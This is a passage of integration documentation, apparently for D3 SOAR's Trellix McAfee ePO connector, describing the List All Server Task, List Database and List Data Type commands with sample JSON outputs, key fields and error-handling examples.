reporting.\\\",\\r\\n \\r\\n  \\\"Delete Threat and Client event records older than 90 days.\\\",\\r\\n \\r\\n  \\\"Purges obsolete Appliance Management data from the McAfee ePO database.\\\",\\r\\n \\r\\n  \\\"Migrate data from old database tables to new database tables. As this activity will consume high database system resources, McAfee recommends administrator to run this task during low Agent-Server communication time (preferably over weekends).\\\",\\r\\n \\r\\n  \\\"Evaluate each system against the DXLBROKER tag criteria and update DXL Broker Policies\\\",\\r\\n \\r\\n  \\\"Refresh required Tags on Active Response servers\\\",\\r\\n \\r\\n  \\\"Syncs users from an LDAP server to the database\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"This default task stores the results of the 'McAfee Agent Compliance Summary' query for use in reporting on compliance history.\\\",\\r\\n \\r\\n  \\\"ePO Database Index Maintenance and statistics update\\\",\\r\\n \\r\\n  \\\"Process properties received from client and convert them into rules.\\\",\\r\\n \\r\\n  \\\"Delete systems whose sequence error count has exceeded the threshold and add Agent GUID to duplicate list.\\\",\\r\\n \\r\\n  \\\"Clear Sequence Error Count for systems who have not recently reported duplicate activities.\\\",\\r\\n \\r\\n  \\\"Downloads the list of software your license key has access to.\\\",\\r\\n \\r\\n  \\\"Runs the set reviewer task\\\",\\r\\n \\r\\n  \\\"Runs the send email task (before each run it will execute: set reviewer task)\\\",\\r\\n \\r\\n  \\\"Deletes events and incidents from the LIVE database tables. Evidence files are not deleted since they associated with the event or incidents in the HISTORY lists.\\\",\\r\\n \\r\\n  \\\"Deletes events and incidents from the HISTORY database tables and mark evidence files for deletion. If the event or incident are still in the LIVE incidents and operational events list tables this task will delete them from the LIVE tables.\\\",\\r\\n \\r\\n  \\\"Delete evidence files that were marked for deletion. Recommended to run on weekly basis.\\\",\\r\\n \\r\\n  \\\"DLP policy conversion from 9.3.x to 9.4.100 and above\\\",\\r\\n \\r\\n  \\\"This task migrates operational events from old 9.3.x schema to 9.4.100 schema and above\\\",\\r\\n \\r\\n  \\\"This task migrates incident events from 9.3 schema to the latest DLP database schema.\\\\nThis task must be run as long as you have McAfee DLP Endpoint 9.3.x agent. Version 9.3.x reports incidents into a legacy DLP database schema.\\\",\\r\\n \\r\\n  \\\"DLP Import MVision Cloud Events\\\",\\r\\n \\r\\n  \\\"This task converts operational events and incidents from 9.4 and above to the latest schema. Run this task once after upgrading from 9.4 and above\\\",\\r\\n \\r\\n  \\\"DLP delete unassociated evidence files\\\",\\r\\n \\r\\n  \\\"Deletes DLP system information and user session information for systems that were removed from ePO system tree\\\",\\r\\n \\r\\n  \\\"Built-in Disaster Recovery Snapshot Server Task (disabled by default for Microsoft SQL Server Express)\\\",\\r\\n \\r\\n  \\\"Detects newly installed discovery servers and enabled them to run discovery scans\\\",\\r\\n \\r\\n  \\\"Data Center: Compute Endpoint Reports\\\",\\r\\n \\r\\n  \\\"Data Center: Compute Dashboard data\\\",\\r\\n \\r\\n  \\\"Runs every 30 minutes and gathers threats for workloads from Point products ENS, ENSL or Solidcore.\\\",\\r\\n \\r\\n  \\\"Deletes seven days old threat events data from CWS_THREATEVENTS_LIST table once every 24 hours.\\\",\\r\\n \\r\\n  \\\"Evaluate each system against the TIESERVER tag criteria and tag the appropriate systems.\\\",\\r\\n \\r\\n  \\\"Synchronizes data between the Active Response Workspace and the cloud platform.\\\"\\r\\n \\r\\n ]\"",
    "enabled": "\"[\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  false,\\r\\n \\r\\n  false,\\r\\n \\r\\n  false,\\r\\n \\r\\n  true,\\r\\n \\r\\n  false,\\r\\n \\r\\n  false,\\r\\n \\r\\n  true,\\r\\n \\r\\n  false,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  false,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  false,\\r\\n \\r\\n  false,\\r\\n \\r\\n  false,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  false,\\r\\n \\r\\n  false,\\r\\n \\r\\n  false,\\r\\n \\r\\n  false,\\r\\n \\r\\n  true,\\r\\n \\r\\n  false,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  false,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true\\r\\n \\r\\n ]\"",
    "endDate": "\"[\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\"\\r\\n \\r\\n ]\"",
    "id": "\"[\\r\\n \\r\\n  *****,\\r\\n \\r\\n  ***** ]\"",
    "name": "\"[\\r\\n \\r\\n  \\\"Update Master Repository\\\",\\r\\n \\r\\n  \\\"TIE Server Telemetry\\\",\\r\\n \\r\\n  \\\"TIE Server Synchronize Topology\\\",\\r\\n \\r\\n  \\\"TIE Server Synchronize CA\\\",\\r\\n \\r\\n  \\\"TIE Server Monitoring\\\",\\r\\n \\r\\n  \\\"TIE Server Database Maintenance\\\",\\r\\n \\r\\n  \\\"TIE Server Data Management\\\",\\r\\n \\r\\n  \\\"Synchronize Shared Tasks\\\",\\r\\n \\r\\n  \\\"Synchronize Shared Policies\\\",\\r\\n \\r\\n  \\\"Send DXL State Event\\\",\\r\\n \\r\\n  \\\"Send DXL Certificate Revocations\\\",\\r\\n \\r\\n  \\\"Roll Up Data (Local ePO Server)\\\",\\r\\n \\r\\n  \\\"Purge Threat and Client Events Older than 90 Days\\\",\\r\\n \\r\\n  \\\"Purge Obsolete Appliance Management Data\\\",\\r\\n \\r\\n  \\\"Migrate Data to New Tables\\\",\\r\\n \\r\\n  \\\"Manage DXL Brokers\\\",\\r\\n \\r\\n  \\\"Manage Active Response Servers\\\",\\r\\n \\r\\n  \\\"LdapSync: Sync across users from LDAP\\\",\\r\\n \\r\\n  \\\"Inactive Agent Cleanup Task\\\",\\r\\n \\r\\n  \\\"Generate Records for McAfee Agent Compliance History Reporting\\\",\\r\\n \\r\\n  \\\"ePO Database Index Maintenance\\\",\\r\\n \\r\\n  \\\"Endpoint Security Firewall Property Translator\\\",\\r\\n \\r\\n  \\\"Duplicate Agent GUID - remove systems with potentially duplicated GUIDs\\\",\\r\\n \\r\\n  \\\"Duplicate Agent GUID - clear error count\\\",\\r\\n \\r\\n  \\\"Download Software Product List\\\",\\r\\n \\r\\n  \\\"DLP Set Reviewer for Operational Events and Incidents\\\",\\r\\n \\r\\n  \\\"DLP Send Email for Operational Events and Incidents\\\",\\r\\n \\r\\n  \\\"DLP Purge Operational Events and Incidents\\\",\\r\\n \\r\\n  \\\"DLP Purge History of Operational Events and Incidents\\\",\\r\\n \\r\\n  \\\"DLP purge evidences\\\",\\r\\n \\r\\n  \\\"DLP Policy Conversion from 9.3.x to 9.4.100 and above\\\",\\r\\n \\r\\n  \\\"DLP operational events migration from 9.3.x to 9.4.100 and above\\\",\\r\\n \\r\\n  \\\"DLP incident migration from 9.3.x to 9.4.100 and above\\\",\\r\\n \\r\\n  \\\"DLP Import MVision Cloud Events\\\",\\r\\n \\r\\n  \\\"DLP events conversion 9.4 and above\\\",\\r\\n \\r\\n  \\\"DLP delete unassociated evidence files\\\",\\r\\n \\r\\n  \\\"DLP delete systems that were removed from ePO system tree\\\",\\r\\n \\r\\n  \\\"Disaster Recovery Snapshot Server\\\",\\r\\n \\r\\n  \\\"Detect Discovery Servers\\\",\\r\\n \\r\\n  \\\"Data Center: Compute Endpoint Reports\\\",\\r\\n \\r\\n  \\\"Data Center: Compute Dashboard data\\\",\\r\\n \\r\\n  \\\"CWS threat events sync task\\\",\\r\\n \\r\\n  \\\"CWS threat events deleter\\\",\\r\\n \\r\\n  \\\"Apply TIESERVER Tags to TIE Servers\\\",\\r\\n \\r\\n  \\\"Active Response Workspace synchronization\\\"\\r\\n \\r\\n ]\"",
    "nextRunTime": "\"[\\r\\n \\r\\n  \\\"2019-12-24T01:41:00-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-24T00:15:00-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-24T00:15:00-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-24T00:15:00-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-23T16:15:00-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-29T02:00:00-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-24T00:30:00-08:00\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"2019-12-24T00:00:00-08:00\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"2019-12-24T00:10:00-08:00\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"2019-12-24T00:00:00-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-24T00:30:00-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-23T16:00:00-08:00\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"2019-12-29T01:00:00-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-29T04:00:00-08:00\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"2019-12-24T01:42:00-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-23T16:00:00-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-23T16:15:00-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-23T22:30:00-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-27T23:30:00-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-28T04:00:00-08:00\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"2019-12-23T22:00:00-08:00\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"2019-12-27T04:00:00-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-24T01:59:00-08:00\\\",\\r\\n \\r\\n  \\\"None\\\",\\r\\n \\r\\n  \\\"2019-12-23T16:00:00-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-23T16:00:00-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-23T16:00:00-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-23T23:00:00-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-24T00:15:00-08:00\\\",\\r\\n \\r\\n  \\\"2019-12-24T00:00:00-08:00\\\"\\r\\n \\r\\n ]\"",
    "startDate": "\"[\\r\\n \\r\\n  \\\"2018-02-14T00:00:01-08:00\\\",\\r\\n \\r\\n  \\\"2019-06-05T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-06-05T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-06-05T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-06-05T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-06-05T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-06-05T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2018-02-14T00:00:01-08:00\\\",\\r\\n \\r\\n  \\\"2018-02-14T00:00:01-08:00\\\",\\r\\n \\r\\n  \\\"2019-05-31T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-05-31T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2018-02-14T00:00:01-08:00\\\",\\r\\n \\r\\n  \\\"2019-05-23T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-06-10T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-05-23T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-05-31T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-06-05T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-05-23T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2018-02-14T00:00:01-08:00\\\",\\r\\n \\r\\n  \\\"2018-02-14T00:00:01-08:00\\\",\\r\\n \\r\\n  \\\"2019-05-23T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-10-22T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2018-02-14T00:00:01-08:00\\\",\\r\\n \\r\\n  \\\"2018-02-14T00:00:01-08:00\\\",\\r\\n \\r\\n  \\\"2019-05-23T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-06-04T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-06-04T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-06-04T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-06-04T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-06-04T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-06-04T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-06-04T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-06-04T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-06-04T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-06-04T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-06-04T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-06-04T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2018-02-14T00:00:01-08:00\\\",\\r\\n \\r\\n  \\\"2019-06-04T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2012-01-01T00:00:01-08:00\\\",\\r\\n \\r\\n  \\\"2012-01-01T00:00:01-08:00\\\",\\r\\n \\r\\n  \\\"2018-06-28T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2018-06-28T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-06-05T00:00:01-07:00\\\",\\r\\n \\r\\n  \\\"2019-06-05T00:00:01-07:00\\\"\\r\\n \\r\\n ]\"",
    "valid": "\"[\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  false,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true,\\r\\n \\r\\n  true\\r\\n \\r\\n ]\""
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

id

name

description

startDate

endDate

nextRunTime

enabled

valid

***

Update Master Repository

This default task updates the master repository from the McAfee update site (McAfeeHttp).

2/14/2018 12:00:01 AM

None

1/7/2020 1:41:00 AM

True

True

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

Parts in Error

Description

Example

Failure Indicator

Indicates the command failure that happened at a specific input and/or API call.

List All Server Task failed.

Status Code

The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details.

Status Code: 401.

Message

The raw data or captured key error message from the integration API server about the API request failure.

Message: Unauthorized.

Error Sample Data

List All Server Task failed.

Status Code: 401.

Message: Unauthorized.

List Database

Retrieves a list of all databases.

Input

N/A

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "name": "ePO",
        "databaseType": ""
    },
    {
        "name": "TIE Server 1.1.1.1",
        "databaseType": "TieServerSchema"
    }
]
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "name": "ePO",
        "databaseType": ""
    },
    {
        "name": "TIE Server 1.1.1.1",
        "databaseType": "TieServerSchema"
    }
]
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "Output": "\"[\\r\\n    {\\r\\n        \\\"name\\\": \\\"ePO\\\",\\r\\n        \\\"databaseType\\\": \\\"\\\"\\r\\n    },\\r\\n    {\\r\\n        \\\"name\\\": \\\"TIE Server 192.168.88.152\\\",\\r\\n        \\\"databaseType\\\": \\\"TieServerSchema\\\"\\r\\n    }\\r\\n]\"",
    "databaseType": "\"[\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"TieServerSchema\\\"\\r\\n \\r\\n ]\"",
    "name": "\"[\\r\\n \\r\\n  \\\"ePO\\\",\\r\\n \\r\\n  \\\"TIE Server 1.1.1.1\\\"\\r\\n \\r\\n ]\""
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

name

databaseType

ePO

TIE Server 1.1.1.1

TieServerSchema

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

Parts in Error

Description

Example

Failure Indicator

Indicates the command failure that happened at a specific input and/or API call.

List Database failed.

Status Code

The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details.

Status Code: 401.

Message

The raw data or captured key error message from the integration API server about the API request failure.

Message: Unauthorized.

Error Sample Data

List Database failed.

Status Code: 401.

Message: Unauthorized.

List Data Type

Retrieves all data types.

Input

N/A

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
 
  {
 
  "type": "udlp_redacted_text",
 
  "operations": [
 
  {
 
  "name": "udlp_eq_redaction_op",
 
  "description": "udlp_eq_redaction_op"
 
  },
 
  {
 
  "name": "not_isBlank",
 
  "description": "Value is not blank"
 
  }
  ]
  }
]
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
 
  {
 
  "type": "udlp_redacted_text",
 
  "operations": [
 
  {
 
  "name": "udlp_eq_redaction_op",
 
  "description": "udlp_eq_redaction_op"
 
  },
 
  {
 
  "name": "not_isBlank",
 
  "description": "Value is not blank"
 
  }
  ]
  }
]
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "Output": "\"[{\\r\\n\\t\\t\\\"type\\\": \\\"udlp_redacted_text\\\",\\r\\n\\t\\t\\\"operations\\\": [\\r\\n\\t\\t\\t{\\r\\n\\t\\t\\t\\t\\\"name\\\": \\\"udlp_eq_redaction_op\\\",\\r\\n\\t\\t\\t\\t\\\"description\\\": \\\"udlp_eq_redaction_op\\\"\\r\\n\\t\\t\\t},\\r\\n\\t\\t\\t{\\r\\n\\t\\t\\t\\t\\\"name\\\": \\\"not_isBlank\\\",\\r\\n\\t\\t\\t\\t\\\"description\\\": \\\"Value is not blank\\\"\\r\\n\\t\\t\\t},\\r\\n\\t\\t\\t{\\r\\n\\t\\t\\t\\t\\\"name\\\": \\\"udlp_not_contains_redaction_op\\\",\\r\\n\\t\\t\\t\\t\\\"description\\\": \\\"udlp_not_contains_redaction_op\\\"\\r\\n\\t\\t\\t},\\r\\n\\t\\t\\t{\\r\\n\\t\\t\\t\\t\\\"name\\\": \\\"isBlank\\\",\\r\\n\\t\\t\\t\\t\\\"description\\\": \\\"Value is blank\\\"\\r\\n\\t\\t\\t},\\r\\n\\t\\t\\t{\\r\\n\\t\\t\\t\\t\\\"name\\\": \\\"udlp_contains_redaction_op\\\",\\r\\n\\t\\t\\t\\t\\\"description\\\": \\\"udlp_contains_redaction_op\\\"\\r\\n\\t\\t\\t},\\r\\n\\t\\t\\t{\\r\\n\\t\\t\\t\\t\\\"name\\\": \\\"udlp_ne_redaction_op\\\",\\r\\n\\t\\t\\t\\t\\\"description\\\": \\\"udlp_ne_redaction_op\\\"\\r\\n\\t\\t\\t}\\r\\n\\t\\t]\\r\\n\\t}]\"",
    "operations": "\"[\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_eq_redaction_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_eq_redaction_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_not_contains_redaction_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_not_contains_redaction_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_contains_redaction_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_contains_redaction_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_ne_redaction_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_ne_redaction_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_ne_formatted_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_ne_formatted_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_eq_formatted_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_eq_formatted_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"childOf\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"childOf\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"descendsFrom\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"descendsFrom\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"lt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Less than\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"le\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Less than or equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"gt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Greater than\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ge\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Greater than or equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"lt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Less than\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"gt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Greater than\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"version_eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"version_eq\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"version_neq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"version_neq\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"version_ge\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"version_ge\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"version_lt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"version_lt\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": 